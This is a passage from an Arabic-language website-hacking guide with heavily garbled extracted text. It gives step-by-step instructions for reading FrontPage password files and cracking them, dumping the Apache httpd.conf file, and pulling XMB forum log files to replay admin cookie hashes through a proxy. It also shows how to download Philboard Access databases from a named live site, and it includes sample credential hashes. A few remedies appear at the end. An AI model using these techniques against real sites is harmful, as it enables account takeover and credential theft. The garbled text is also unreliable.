‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻌ ﺮا ضاﻟﺼﻔ ﺤﺎ ت []‬ ‫[] ‪cat‬ﺰي ﻣﺎ ذﻛ ﺮﻧﺎ ﺳﺎﺑﻘﺎاﻟﻠﻲ ﻫﻮاﺳ‬


‫[] ‪ home‬ﻫﻮ ﻋﺒﺎره ﻋﻦﻗﺴﻢﻓﻲ ﻫﺎردﯾﺴﻚ ﺳﯿ ﺮﻓ ﺮﻟﯿﻨﻜ ﺲ زﯾﻪ زي ‪D‬‬
‫ﺎو ‪C‬ﻓﻲاﻟﻮﯾﻨﺪوز []‬
‫ﻗﻊ‬
‫[] ‪ public_html‬ﻫﺬا ﻫﻮ ﻋﺒﺎره ﻋﻦ ﻣﻠ ﻒ ﻣﻮﺟﻮد دا ﺧ ﻞايا فﺗﻲﺑﻲ ﻻي ﻣﻮ‬
‫ﻓﻲاﻟﺪﻧﯿﺎ وﻫﺬااﻟﻤﻠ ﻒ ﻣﻬﻢ ﻻﻧﻪ دا ﺧﻠﻪﺗﻨ ﺤﻂاﻟﺼﻔ ﺤﺎ ت وﻻ ﺣﻈﻮ‬
‫ﻗﻊ‬‫ـ ‪public_html‬ﻟﻜ ﻞاﻟﻤﻮا‬ ‫ﺎﻧﻪ ﻣﻮﺟﻮدﻓﻲاﻟﺴﯿ ﺮﻓ ﺮﻛ ﻞ ﻣﻠﻔﺎ تاﻟ‬
‫ﺎﻟﻠﻲ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ []‬
‫[] ‪ _vti_pvt‬وﻫﻮ ﻣﻠ ﻒ ﻣﻮﺟﻮدهﻓﯿﻪ ﻣﻠﻔﺎ تاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ []‬
‫[] ‪ service.pwd‬وﻫﻮاﻟﻤﻠ ﻒاﻟﻠﻲﺑﯿﻔﯿﺪكﻓﻲ رؤﯾﺔﻛ ﻞﺑﺎﺳﻮردا ت ﺎﻟﺴﯿ ﺮﻓ ﺮ ﻣﻊ‬
‫ﺘﻜﻮن ﻣﺸﻔ ﺮه []‬ ‫ﯾﻮزراﺗﻬﺎﺑ ﺲﺑ‬

‫ﻗﻊاﻟﻤﻮﺟﻮد ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ وﺗ ﺮﯾﺪ رؤﯾ ﺖ ﻣﻠ ﻒ‬


‫[] ‪ XXX‬ﺎﺳﻢاﻟﻤﻮ‬
‫ﺎﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞﻓﯿﻪ []‬

‫‪-----------------------‬‬
‫ﻗﯿﻬﺎ ﻣﺸﻔ ﺮه‬
‫ﺘﻼا‬
‫ﻮﺑﻌﺪ وﺟﻮوداﻟﺒﺎﺳﻮردا ت ﻃﺒﻌﺎﺑ‬
‫ﻻﻧﻬﺎ ﻋﺒﺎره ﻋﻦ ﻣﻠﻔﺎ ت ‪ service.pwd‬ﻻﻧﻬﺎ ﻣﻠﻔﺎ تاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ‬
‫ﻗﻲ‪:‬‬ ‫ﺎذا را حﺗﻼ‬
‫‪# -FrontPage-‬‬
‫‪adshhhhg:T_h1rTAnSmwck‬‬
‫‪advrsgrent:yTPvsh2SKGI46‬‬
‫‪# -FrontPage-‬‬
‫‪sfjhsdlj:KH5xpD5HGFQio‬‬
‫‪# -FrontPage-‬‬
‫‪sdfQKG0nPulR5aY‬‬
‫‪# -FrontPage-‬‬
‫‪afsdfgrica:7njMXh9/HImTA‬‬
‫‪# -FrontPage-‬‬
‫‪aftergsdfsgnoo:wyXqflo6kr7TI‬‬

‫ﺘﺸﻔﯿ ﺮ‬‫ﺘﻔﻚاﻟ‬‫ﺮا حﺗﻠﻘﺎه زيﻛﺬاﻛﺬا ﻋﺎداﻧ ﺖ ﻮﺷﻄﺎرﺗﻚﺑﺒ ﺮﻧﺎﻣ ﺞ ﺟﻮﻫﻦ ذا رﯾﺒ ﺮﺑ‬
‫‪------------------------‬‬
‫اوﻛﻲاﻟ ﺤﯿﻦﺑﯿﺠﻲ وا ﺣﺪ ﻣﻮﺳﻮسﺑﯿﻘﻮ لﻓﻲ ﻧﻔﺴﻪ ﻃﯿﺐاﻧﺎ ﺟﺒ ﺖ ﺎﻟﺒﺎﺳﻮردا ت ‪+‬اﻟﯿﻮزرا ت‬
‫ﻗﻊ ))ﻓﻌﻼاﻟﻮﺳﻮﺳﻪﻟﻬﺎﻓﺎﯾﺪةاﻟﯿﻮﻣﯿﻦﺬي ((‬ ‫ﻛﯿ ﻒاﻋ ﺮ فاﺳﻢاﻟﻤﻮ‬
‫ﻗﻮﻟﻚﺗﻌﺎ ل ﺣﺒﯿﺒﻲ‬ ‫ﺎوﻛﻲا‬

‫ﺘﺐاﻻﻣ ﺮ ذا‬
‫اﻛ‬

‫‪cat /etc/httpd/apache/conf/httpd.conf‬‬

‫ﺘﻌ ﺮ ضﻟﻚﻛ ﻞﻛﺒﯿ ﺮه و ﺻﻐﯿ ﺮهﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ‬‫ﻓﻲ ﻫﺬا ﺎﻟﻤﻠ ﻒ را ح ﯾﺴ‬


‫ﺘﺪيﺑﺸ ﺮ ح ﻫﺬااﻻﻣ ﺮ‪:‬‬ ‫ﻧﺒ‬

‫‪٢ ٤٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ً[]‬‫[] ‪cat‬ﺗﻢ ذﻛ ﺮه ﺳﺎااااااااااااﺑﻘﺎ‬


‫[] ‪ etc‬وﻫﻮ ﻋﺒﺎره ﻋﻦ ﻣﻠ ﻒ ﺷﺒﻪاﻣﻨﻲﺗﺨﺰنﻓﯿﻪاﻟﺒﺎﺳﻮردا ت وﻣﻠﻔﺎ ت‬
‫ﺎﻟﻠﻮج واﻷﺷﯿﺎ ءاﻟﻤﺴﻤﻮ حﺑﻬﺎﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ []‬
‫ﻗﻊاﻟﻤﻮﺟﻮده ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ[]‬ ‫[] ‪ httpd‬وﻫﻮ ﻣﻠ ﻒاﻟﻤﻮا‬
‫[] ‪ apache‬ﻣﻠ ﻒ ﯾﻮﺟﺪ دا ﺧ ﻞاﻟﻤﻠ ﻒاﻻﻣﻨﻲ وﺗﻮﺟﺪﺑﻪ ﻣﻌﻠﻮﻣﺎ ت ﻋﻦ ﺎﻟﺴﯿ ﺮﻓ ﺮ‬
‫ﺘ ﺺﺑﻪ []‬ ‫ﻮﻧﻮﻋﻪ وﻛ ﻞ ﺷﻲ ﯾﺨ‬
‫ﺘ ﺺﺑﻜ ﻞ ﻣﺎﻫﻮ‬ ‫ﺘﺼﺎرﻟﻜﻠﻤﺔ ‪ config‬ﻮﻫﻮ ﻣﻠ ﻒﺑﺸﻜ ﻞ ﻋﺎم ﯾﺨ‬ ‫[] ‪ conf‬ﻮﻫﻮا ﺧ‬
‫ﻗﻊاوﻟﻘﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ ت []‬ ‫ﻗﻊ ﻣﺜ ﻞاﻟﯿﻮزر واﻟﺒﺎﺳﻮردﻟﻠﻤﻮ‬ ‫ﺳ ﺮيﺑﺎﻟﻤﻮ‬
‫ﻗﻊ‬ ‫[] ‪ httpd.conf‬ﻮﻫﻮاﻟﻤﻠ ﻒ ﺎﻟﻤﻄﻠﻮباﻟﻠﺬي ﯾﻮﺟﺪﻓﯿﻪﻛ ﻞ ﺷﻲ ﺧﺎ صﺑﺎﻟﻤﻮ‬
‫ﺘﻪ ﻋﻠﻰ ﺎﻟﺴﯿ ﺮﻓ ﺮ واﯾﻤﯿ ﻞ ﺻﺎ ﺣﺒﻪ []‬ ‫ﺎﺳﻤﻪ واﻟﯿﻮزراﻟﺨﺎ صﺑﻪ وﻣﺴﺎ ﺣ‬

‫ﻮﻫﺬااﻟﻠﻲ را حﺗﻠﻘﺎه‬
‫‪PHP:‬‬

‫‪ServerAlias <a href="http://www.NIGHTMARE.com" target="_blank">w‬‬


‫‪ww.NIGHTMARE.com</a> NIGHTMARE.com‬‬
‫]‪ServerAdmin [email]webmaster@NIGHTMARE.com[/email‬‬
‫‪DocumentRoot /home/NIGHTMARE/public_html‬‬
‫‪BytesLog domlogs/NIGHTMARE.com-bytes_log‬‬
‫‪User NIGHTMARE‬‬
‫‪Group NIGHTMARE‬‬
‫‪ServerName <a href="http://www.NIGHTMARE.com" target="_blank">w‬‬
‫>‪ww.NIGHTMARE.com</a‬‬
‫‪CustomLog domlogs/NIGHTMAREcom combined‬‬
‫‪ScriptAlias /cgi-bin/ /home/NIGHTMARE/public_html/cgi-bin‬‬

‫اذاﻟﻢ ﯾﺒ ﻖﻟﻚ ﺷﺊاﺗﻜ ﻞ ﻋﻠﻰا ﷲ‬


‫ﺘﺸﻔﯿ ﺮ‬‫ﻮﻓﻚاﻟ‬
‫ﻗﻊ و ﺣﻂاﻻﻧﺪﻛ ﺲ‬‫ﺷﻐ ﻞاﻻ فﺗﻲﺑﻲ واﻣﺴﺢاﻟﻤﻮ‬
‫ﺘﺎام‪...‬‬‫ﻮاﻟﺴﻼم ﺧ‬

‫‪٢ ٤٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺛﻐﺮة ﰲ ﻧﻮع ‪ XMB‬ﻣﻦ اﳌﻨﺘﺪﯾﺎت "‬

‫‪$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪MaXhAk2000 :‬‬
‫‪$$$$$$$$$$$$$$$$‬‬

‫اﻟﺴﻼم ﻋﻠﯿﻜﻢ ور ﺣﻤﺔا ﷲ وﺑ ﺮﻛﺎﺗﻪ‪،،،‬‬

‫ﻗﻮ ل‬‫ﺘﺨﺪام ﺧﺎ ﻃﺊﻟﻬﺬهاﻟﻐ ﺮه ﺿﺪا ﺧﻮاﻧﻨﺎاﻟﻌ ﺮب‪،‬وا ﷲ ﻋﻠﻰ ﻣﺎا‬ ‫ﺘﻲ ﻣﻦاياﺳ‬ ‫ﺎﻣﺎﺑﻌﺪ )))))))ﻓﺄﻧﺎاﺑ ﺮئ ذﻣ‬
‫ﺷﻬﯿﺪ((((((‪...‬‬
‫ﺑﺴﻢا ﷲ ﻧﺒﺪأ‪،،،‬‬
‫ﺘﺴﺒ ﺖ ﺷﻬ ﺮه واﺳﻌﻪﻓﻲ ﻣﺠﺎﻟﻬﺎ و ﺣﺎﻟﻬﺎ ﺣﺎ لاﻟﻜﺜﯿ ﺮ ﻣﻦ‬ ‫ﺘﻲاﻛ‬ ‫ﺘﺪﯾﺎ تاﻟ‬ ‫ﺘﺪﯾﺎ ت ﻣﻦ ﻧﻮ ع ‪ xmb‬ﻣﻦ ﺎﻟﻤﻨ‬ ‫ﺘﺒ ﺮاﻟﻤﻨ‬
‫ﺗﻌ‬
‫ﻗﺎ تﻓﻼ ﯾﻮﺟﺪ ﺷﻲ ءﻛﺎﻣ ﻞ ﻋﻠﻰ وﺟﻪاﻷر ضاﻻ ﺎ ﷲ‬ ‫ﺘ ﺮا‬
‫ﺘﺪﯾﺎ ت ﻣﻦ وﺟﻮداﻟﺜﻐ ﺮا ت واﻷ ﺧ‬
‫اﻷﻧﻮا عاﻷ ﺧ ﺮى ﻣﻦاﻟﻤﻨ‬
‫ﻋﺰ وﺟ ﻞ‪..‬‬

‫ﻮ ﺻ ﻒﻟﻠﺜﻐ ﺮه‪::‬‬
‫ﺘﺪىاوﺗﻜﻮن‬
‫ﺘﺪﯾﺎ ت ﻣﻤﺎ ﯾﻤﻜﻨﻚانﺗﻜﻮناﻟﻤﺪﯾ ﺮ ﻋﻠﻰاﻟﻤﻨ‬
‫ﺘﺸﺎ فﺛﻐ ﺮه ﺟﺪﯾﺪهﻓﻲ ﻫﺬااﻟﻨﻮ ع ﻣﻦ ﺎﻟﻤﻨ‬ ‫ﻗﺪﺗﻢاﻛ‬ ‫ﻮ‬
‫ﻣﺸ ﺮ فاوياي ﻋ ﻀﻮا ﺧ ﺮ‬

‫ﺎﻷﺻﺪاراﻟﻤﺼﺎب‪:::‬‬
‫‪XMB 1.6 Magic Lantern Final‬‬

‫ﺘﻄﺒﯿ ﻖ‪:::‬‬‫ﺎﻟﺸ ﺮ ح ﻮاﻟ‬


‫ﺘﻰ ﯾﻔﻬﻢ وﯾﻜﻮناووو ﺿﺢ وأﺳﻬ ﻞ‪:‬‬
‫ﺘﻘﺴﯿﻢاﻟﺪرس ﻋﻠﻰ ﺧﻄﻮا ت ﺣ‬
‫ﻗﻮمﺑ‬
‫ﻗ ﺖاﻟ ﺸﻐ ﻞ واﻟﺠﺪ <<< ﺳﻮ فا‬‫ﺟﺎ و‬

‫ﻗﻊ ﺟﻮﺟ ﻞ ‪http://www.google.com/‬‬ ‫‪1-‬ﻋﻠﯿﻚﺑﺎﻟﺬﻫﺎباﻟﻰ ﻣﻮ‬


‫ﺘﺐﻓﻲ ﻣﻨﻄﻘﺔاﻟﺒ ﺤﺚ‪XMB 1.6 Magic Lantern Final‬‬ ‫‪2-‬ﺎﻛ‬
‫ﺘﺪﯾﺎ تﻛﺜﯿﯿﯿﯿﯿﯿﯿﯿ ﺮهاﻛﺜ ﺮﻫﺎ ﻣﺼﺎﺑﻪﺑﻬﺬهاﻟﺜﻐ ﺮهﻟﻜﻦ رﺟﺎاا ء‬‫‪ 3-‬ﺳﻮ فﺗ ﺮى ﻣﻨ‬
‫ﺘ ﺤﺬﯾ ﺮﻫﺎ ﻣﻦاﻟﺜﻐ ﺮهاﻟﻤﻮﺟﻮده‪.‬‬‫ﺘﺪﯾﺎ تاﻟﻌ ﺮﺑﯿﺔ ﻮﻋﻠﯿﻚﺑ‬ ‫ﻻﺗﻘ ﺮباﻟﻤﻨ‬
‫ﺘﺪى‬‫ﺘﺎﻟﯿﺔﺑﻌﺪ ﻋﻨﻮاناﻟﻤﻨ‬‫ﺘﺎﺑﺔاﻟﻜﻠﻤﺔ ﺎﻟ‬‫ﻗﻢﺑﻜ‬ ‫ﺘﺪى و‬ ‫‪4-‬ﺎ ﺿﻐﻂ ﻋﻠﻰاي ﻣﻨ‬
‫‪index_log.log‬ﯾﻌﻨﻲ را ح ﯾﻜﻮن زيﻛﺪه‬
‫‪http://www.******.com/massegboard/index_log.log‬‬
‫‪ 5-‬ﺮا ح ﯾﻨﺰ ل ﻋﻨﺪك ﻣﻠ ﻒ واﻟﻤﻠ ﻒ ﻋﺒﺎره ﻋﻦ ﻣﻠ ﻒ زياﻟﻜﻮﻛﯿﺰﻛﺒﯿ ﺮ وﻓﯿﻪاﺳﻤﺎ ء‬
‫ﺘﺨﺪﻣﯿﻦ واﻟﺒﺎﺳﻮرد ﻮأﺷﯿﺎ ءﺛﺎﻧﯿﻪ ﻣﺎﺗﻬﻤﻨﺎ‪.‬‬ ‫ﺎﻟﻤﺴ‬
‫ﺘﺪى ﻋﻦاﺳﻢاﻟﻤﺪﯾ ﺮ وذﻟﻚﺑﺎﻟﺬﻫﺎباﻟﻰاﻟﻤﻮا ﺿﯿﻊ‬ ‫‪6-‬ﺎﻷن ﻋﻠﯿﻚﺑﺎﻟﺒ ﺤﺚﻓﻲاﻟﻤﻨ‬
‫ﺘﻮراﻧﺴ ﺦ ﺎﺳﻤﻪ‪.‬‬ ‫ﺘ ﺮﯾ‬
‫ﻮﺗﺸﻮ فاﻷﺳﻤﺎ ء واﻟﻲﺗﻠﻘﻰﺗ ﺤ ﺖاﺳﻤﻪادﻣﻦ ﺳ‬
‫ﻗﻊ وﺳﻮيﺑ ﺤﺚ ﻋﻦاﺳﻢاﻟﻤﺪﯾ ﺮ را ح ﯾﺠﯿﻚ زي‬ ‫ﺘﻪ ﻣﻦاﻟﻤﻮ‬ ‫ﺘﺢاﻟﻤﻠ ﻒاﻟﻲ ﻧﺰﻟ‬ ‫‪7-‬اﻓ‬
‫ﻛﺪه ﻣﺜﻼ‪::‬‬
‫‪xmbuser=admin‬‬
‫ﻮاﺑﺎس را حﺗﻠﻘﺎهﻗﺪاﻣﻪ زيﻛﺪه‬
‫‪xmbpw=1faeb6747a31c854800ddf3c62b1717a‬‬
‫ﺘﺸﻔﯿ ﺮ ﺻﻌﺐﻟﻬﺬااﻟﻐ ﺮ ضﻗﺎﻣ ﺖ ﺷ ﺮﻛﺔ‬ ‫‪ 8-‬ﻃﺒﻌﺎاﻟﺒﺎسﻓﻲ ﻫﺬهاﻟ ﺤﺎﻟﻪ ﻣﺸﻔ ﺮ ﻮﻓﻚاﻟ‬

‫‪٢ ٥٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺼﻤﯿﻢﺑ ﺮﻧﺎﻣ ﺞ ﯾﻘﻮمﺑﻬﺬااﻟﻐ ﺮ ض وﻫﺬه ﻮﺻﻠ ﺖاﻟﺒ ﺮﻧﺎﻣ ﺞ‬ ‫‪CCI‬ﺑ‬


‫‪ftp://www.cafecounterintelligence.com/cci/chigger.exe‬‬
‫ﺘﺎﻟﻲﻓﻲاﻟﺼﻮرة‪:‬‬ ‫‪9-‬ﺎﻋﺪاد تاﻟﺒ ﺮﻧﺎﻣ ﺞﻛ‬

‫ﻗﻢ )‪(١‬ﻗﻢﺑﻮ ﺿﻊ ﻋﻼﻣﺔ ﺻﺢ‪.‬‬ ‫ﺮ‬


‫ﻗﻢ )‪(٢‬ﻗﻢﺑﻮ ﺿﻊاﺳﻢاﻟﻌ ﻀﻮ ﺳﻮا ء ﻣﺪﯾ ﺮاو ﻏﯿ ﺮه‬‫ﺮ‬
‫ﻗﻢ )‪(٣‬ﻗﻢﺑﻮ ﺿﻊاﻟﺒﺎساﻟﻤﺸﻔ ﺮ ﺣ ﻖاﻟﻌ ﻀﻮاواﻟﻤﺪﯾ ﺮاو ﻏﯿ ﺮه‬ ‫ﺮ‬
‫ﻗﻢ )‪(4‬ﻗﻢﺑﻮ ﺿﻊ ﻋﻼﻣﺔ ﺻﺢ‪.‬‬ ‫ﺮ‬
‫ﻗﻢ )‪(٥‬ﻗﻢﺑﻮ ﺿﻊاﻟﺒ ﺮوﻛﺴﻲاﻟﻲﺗ ﺮﯾﺪهاواﻟﺒ ﺮوﻛﺴﻲ ﺣ ﻖ ﻣﺰوده ﺎﻟﺨﺪﻣﻪ ﺣﻘﻚ‬ ‫ﺮ‬
‫ﻗﻢ )‪(٦‬ﻗﻢﺑﻮ ﺿﻊاﻟﻤﻨﻔﺬ ﺣ ﻖاﻟﺒ ﺮوﻛﺴﻲ‬
‫ﺮ‬

‫‪10-‬ﺑﻘﻲ ﺷﻲ ء وا ﺣﺪﺑﻌﺪ ﺎﺗﻤﺎماﻷﻋﺪادا ت ﺣﻘ ﺖاﻟﺒ ﺮﻧﺎﻣ ﺞﺑﻘﻲانﺗﺬﻫﺐاﻟﻰ‬


‫ﺘ ﺮﻧ ﺖاﻛﺴﺒﻠﻮرر > ﺎ ﺿﻐﻂﺑﺎﻟﺰراﻟﯿﻤﯿﻦ >ﺎﻷﺗﺼﺎﻻا ت >ﺎﻋﺪادا ت>‬ ‫ﺘﺼﻔﺢاﻧ‬ ‫ﺎﻟﻤ‬
‫ﻗﻢﺑﻮ ﺿﻊاﻟﺒ ﺮوﻛﺴﻲﻫﺬا >‪ 127.0.0.1‬ﻮاﻟﻤﻨﻔﺬ ‪٨٠٨٠‬‬
‫ﺘﺪى‬
‫ﺘﻬﺪ ف وﺗﺠﻮ لﻓﯿﻪ وﻛﺄﻧﻚ ﺎﻟﻤﺪﯾﺮﺗﺒﻊاﻟﻤﻨ‬ ‫ﺘﺪىاﻟﻤﺴ‬ ‫‪11-‬ﺑﻌﺪ ذﻟﻚاذﻫﺐﻟﻠﻤﻨ‬
‫ﻮﺳﻮياﻟﻲﺗﺒﻐﺎه‪.‬‬
‫‪-------------------------------------------‬‬
‫ﺎﻟ ﺤ ﻞﻟﺴﺪ ﺎﻟﺜﻐ ﺮة‪:‬‬

‫ﺘﺎﻟﻲ‪::‬‬
‫ﺘﺼﺪيﻟﻬﺬهاﻟﺜﻐ ﺮه و ﺣﻠﻬﺎ ﻋﻠﯿﻚﺑﺎﻟ‬ ‫ﻟ‬
‫ﺘﺢاﻟﻤﻠ ﻒ‪index.php‬‬ ‫‪1-‬ﺎﻓ‬
‫ﺘﺎﻟﻲ ‪:‬‬ ‫‪2-‬ﻮاﺑ ﺤﺚ ﻋﻦاﻟﻜﻮداﻟ‬
‫"‪include "index_add.php‬‬
‫>?‬
‫ﺛﻢﻗﻢﺑ ﺤﺬﻓﻪ‪.‬‬ ‫‪3-‬‬
‫ﺘﺪى‪.‬‬‫ﻗﻢﺑ ﺤﺬ فاﻟﻤﻠ ﻒ ‪ index_log.log‬ﻣﻦ ﻣﺠﻠﺪ ﺎﻟﻤﻨ‬ ‫‪4-‬‬
‫=======‬
‫ﻃ ﺮﯾﻘﻪا ﺧ ﺮىﻟ ﺤ ﻞ ﻫﺬهاﻟﺜﻐ ﺮه‬
‫ﺘﺪىاﻟﻰ ﺎﻷﺻﺪار‪1.8‬‬ ‫ﺘ ﺮﯾﻘﺔاﻟﻤﻨ‬ ‫ﻗﻢﺑ‬
‫**************************************************‬
‫************************************‬
‫ﺘﻬﻰ ﺎﻟﺸ ﺮ ح‪....،،،‬‬‫ﺎﻧ‬

‫‪٢ ٥١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺷﺮح ﺛﻐﺮة ‪" philboard‬‬

‫‪$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪Hi_HaCkEr :‬‬
‫‪$$$$$$$$$$$$$$‬‬

‫ﺳﺄذﻛ ﺮا ﺣﺪاﻟﺜﻐ ﺮا تﻓﻲﺑﻌ ﺾاﻟﻠﻐﺎ تاﻟﺪﯾﻨﺎﻣﯿﻜﯿﺔ ‪(asp) active server pages‬‬

‫ﺘﻌﺎﻣ ﻞ ﻣﻊﻗﻮاﻋﺪﺑﯿﺎﻧﺎﺗﻬﺎ ‪.‬‬


‫ﻃﺒﻌﺎﻫﺬهاﻟﻠﻐﺔ وﻟﻸﺳ ﻒﺑﻬﺎﺛﻐ ﺮا ت ﻋﺪﯾﺪة و ﺧﺼﻮ ﺻﺎﻓﻲاﻟ‬

‫ﺘ ﺮﻧ ﺖ وﻟﻬﺎ ﻣﯿﺰة‬
‫ﻗﻊاﻻﻧ‬
‫ﺘﻔﺎﻋﻠﯿﺔﻟﺒ ﺮﻣﺠﺔ ﻣﻮا‬
‫ﺘﺒ ﺮ ﻣﻦﻟﻐﺎ تاﻟﺒ ﺮﻣﺠﺔاﻟﺪﯾﻨﺎﻣﯿﻜﯿﺔ ﺎﻟ‬
‫ﺘﺼ ﺮﻫﺬهاﻟﻠﻐﺔﺗﻌ‬‫ﺑﺸﻜ ﻞ ﻣﺨ‬
‫ﺑﺄناﻟﻜﻮدﻟﻬﺎ ﻣﺨﻔﻲ‬

‫ﺛﺔأﻧﻮا ع ﻫﻲ ‪:‬‬
‫ﺘﻤﺪﻗﻮاﻋﺪﺑﯿﺎﻧﺎﺗﻬﺎ ﻋﻠﻰﺛﻼ‬
‫ﻮﺗﻌ‬
‫‪sqlserver && sql && M.S Access‬‬

‫ﺘﺪادا واﺳﻢ‬
‫ﻮاﻣﺎﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت ﻣﺎ ﯾﻜ ﺮوﺳﻮﻓ ﺖأﻛﺴ ﺲﻓﺜﻐ ﺮاﺗﻬﺎ ﻣﻦأﺑﺴﻂاﻟﺜﻐ ﺮا تﺑ ﺤﯿﺚ ﺎﻧﻚاذا وﺟﺪ تاﻣ‬
‫ﺘﻄﯿﻊﺗ ﺤﻤﯿﻠﻬﺎ ﻋﻠﻰ ﺟﻬﺎزك ﻣﺒﺎﺷ ﺮة ﻮﺗﺼﻔﺢ ﺟﻤﯿﻊاﻟﺒﺎﺳﻮردا تﺑﺴﻬﻮﻟﺔ وﯾﺴ ﺮ‬ ‫ﻗﺎﻋﺪةاﻟﺒﺎﻧﺎ تﻓﻘﻂﻓﺎﻧﻚﺗﺴ‬
‫وﺑﺪونﺗﺸﻔﯿ ﺮأﯾ ﻀﺎ ‪.‬‬

‫ﺘ ﻀﺢ ﺟﻠﯿﻪﺑﻬﺎﻫﺬهاﻟﺜﻐ ﺮة وﻫﻲﺑﺎﺳﻢ ‪philboard.asp‬‬ ‫ﺘﻲﺗ‬ ‫ﺘﺪﯾﺎ تاﻟ‬ ‫ﻮاﻟﯿﻜﻢاﻟﻤﺜﺎ ل ﻣﻦأ ﺣﺪ ﺎﻟﻤﻨ‬


‫ﺘﺪى ‪http://www.khill.co.uk/forum/philboard.asp‬‬ ‫ﻣﺜ ﻞ ﻫﺬا ﺎﻟﻤﻨ‬
‫ﺘﺪﯾﺎ تاذﻫﺐاﻟﻰ ﺟﻮﺟ ﻞﻛﻤﺎ ذﻛ ﺮﻧﺎ ﺳﺎﺑﻘﺎ واﺑ ﺤﺚ ﻋﻦ ‪> --------------‬‬ ‫ﻮ ﻃ ﺮﯾﻘﺔاﯾﺠﺎد ﻣﺜ ﻞ ﻫﺬااﻟﻨﻮ ع ﻣﻨ‬
‫ﺘﺎﺋ ﺞ‪....‬‬
‫ﺘﻈ ﺮاﻟﻨ‬ ‫‪philboard‬ﻮاﻧ‬

‫‪-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+‬‬
‫ﻛﯿ ﻒﺗ ﺤﻤ ﻞﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت ؟‬

‫ﺘﺪاد‬
‫ﺘﺐ ﻫﺬااﻻﻣ‬ ‫اﻛ‬
‫ﺘﻰ ﯾﻜﻮن ﺣﺠﻢﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت ﺻﻐﯿ ﺮ ﺟﺪا‬
‫ﺘﺪىﺑﻪ ﻋﺪﯾﺪﻗﻠﯿ ﻞ ﻣﻦاﻟﻤﻮا ﺿﯿﻊ ﺣ‬ ‫ﻮﺑﻌﺪ ذﻟﻚ ﺣﺎو لان ﯾﻜﻮناﻟﻤﻨ‬
‫ﺘﺴﻠﯿﻢﺑﺴ ﺮﻋﺔ‬‫ﺘﻄﺒﯿ ﻖ واﻟ‬‫ﻟﻠ‬
‫ﺘﺪاد واﺳﻢﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ تﻟﻘﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت‬ ‫ﻮﻫﺬا ﻫﻮاﻣ‬
‫‪database/philboard.mdb‬‬
‫ﺘﺪى ﻣﺜ ﻞ‬ ‫ﻗﻊ واﻟﻤﻨ‬‫ﺘﺒﻪﺑﻌﺪاﺳﻢاﻟﻤﻮ‬ ‫ﻮﺗﻜ‬
‫‪http://www .khill.co.uk/forum/database/philboard.mdb‬‬

‫وﻻﺑﺪﻟﻜﻲﺗﻘ ﺮاﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ تان ﯾﻜﻮنﻓﻲ ﺟﻬﺎزكﺑ ﺮﻧﺎﻣ ﺞ ﻣﺎ ﯾﻜ ﺮوﺳﻮﻓ ﺖأﻛﺴ ﺲ‬


‫ﺘﻮﯾﺎ تﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت‬
‫ﺘﺠﺪﺑﺪا ﺧﻠﻬﺎ ﻋﺪة ﺟﺪاو لﻓﯿﻌﺎ ﺟﻤﯿﻊ ﻣ ﺤ‬‫ﺘﺢﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت ﺳ‬
‫ﻮﺑﻌﺪﻓ‬
‫ﺘﺨﺪﻣﯿﻦا ل ‪users‬‬ ‫ﻣﻦ ﺿﻤﻨﻬﺎ وﻫﻮاﻟﻤﻬﻢ ﺟﺪو لاﻟﻤﺴ‬

‫‪٢ ٥٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺠﺪاو لاﺳﻢ ﻋﺎﻟﺒﺎ ﻫﻮ ‪ admin‬ﻮﻫﻮ ﺎﺳﻢاﻟﻤﺪﯾ ﺮاﻟﻌﺎم ﻣﻊاﻟﺒﺎﺳﻮورد‬


‫ﻮﺳ‬

‫ﺘﺪﯾﺎ ت ‪philboard.asp‬‬
‫ﺘﺪى ‪.‬ﻓﻜﻤﺎ راﯾﻨﺎان ﻣﻨ‬
‫ﻮاﻟ ﺤ ﻞﻟﻬﺬهاﻟﺜﻐ ﺮة ‪/‬ﻫﻮﺗﻐﯿﯿ ﺮ ﻣ ﺴﺎرﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ تﻟﻜ ﻞ ﻣﻨ‬
‫ﺘﺪاد‪.....‬‬‫ﻗﻮاﻋﺪﺑﯿﺎﻧﺎﺗﻬﺎ ﺟﻤﯿﻌﺎﻟﻬﺎ ﻧﻔ ﺲاﻻﺳﻢ واﻻﻣ‬

‫‪٢ ٥٣‬‬
